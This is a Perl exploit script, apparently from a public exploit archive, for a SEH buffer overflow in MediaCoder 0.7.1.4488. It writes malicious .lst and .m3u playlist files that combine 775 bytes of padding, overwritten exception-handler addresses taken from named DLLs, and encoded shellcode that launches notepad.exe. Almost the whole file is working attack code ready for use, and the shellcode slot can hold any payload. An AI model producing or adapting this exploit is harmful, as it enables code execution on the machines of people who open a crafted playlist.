#!/usr/bin/perl
#[+] software : MediaCoder 0.7.1.4488 (.lst & .m3u) Universal Buffer overflow (SEH)
#[+] Author : opt!x hacker <optix@9.cn>
#[+] greetz to germaya_x  because he finds an exploit in MediaCoder 0.7.1.4486
#[+] download :http://www.mediacoderhq.com/dlfull.htm
#[+] tested under: SP2 (FR)
##########################################################
 
# windows/exec - 153 bytes
# Encoder: x86/jmp_call_additive
# EXITFUNC=seh, CMD=notepad.exe
my $shellcode=
"\xfc\xeb\x11\x5e\xbf\x5c\xae\xcd\xea\x56\x31\x3e\xad\x01" .
"\xc7\x85\xc0\x75\xf7\xc3\xe8\xea\xff\xff\xff\xa0\x46\x89" .
"\xea\x58\x97\x99\xae\x64\x1c\xe1\x35\xec\x23\xf5\xbd\x43" .
"\x3c\x82\x9d\x7b\x3d\x7f\x68\xf0\x09\xf4\x6a\xe8\x43\xca" .
"\xf4\x58\x27\x0a\x72\xa7\xe9\x41\x76\xa6\x2b\xbe\x7d\x93" .
"\xff\x65\x7a\x96\x1a\xee\xdd\x7c\xe4\x1a\x87\xf7\xea\x97" .
"\xc3\x58\xef\x26\x3f\xed\x13\xa2\xbe\x1a\xa2\xe8\xe4\xd8" .
"\x76\x4f\xd4\x16\x18\x26\x72\x5d\x9f\xf6\xf1\x21\x2c\x7c" .
"\x75\xbd\x81\x09\x1e\xb5\x50\xf5\x5c\x05\x08\x56\x0b\x75" .
"\x47\x52\x94\x1d\xc0\xa5\xa0\xd3\xa7\xa6\x52\x85\x28\x2d" .
"\xf8\x29\xd6\xa9\x2c\xac\x60\x57\x31\x2e\x91\x97\x31";


my $junk="\x41" x 775;
my $next_seh1="\x10\x00\xF3\xA2"; # call esp in mcres.dll = 0x1000F3A2
my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe
open(myfile,'>>mediacoder.lst');
print myfile $junk.$next_seh1.$seh.$shellcode;

my $next_seh2="\x87\x51\x37\x00"; # jmp esp in sdl.dll
open(myfile,'>>mediacoder.m3u');
print myfile $junk.$next_seh2.$seh.$shellcode;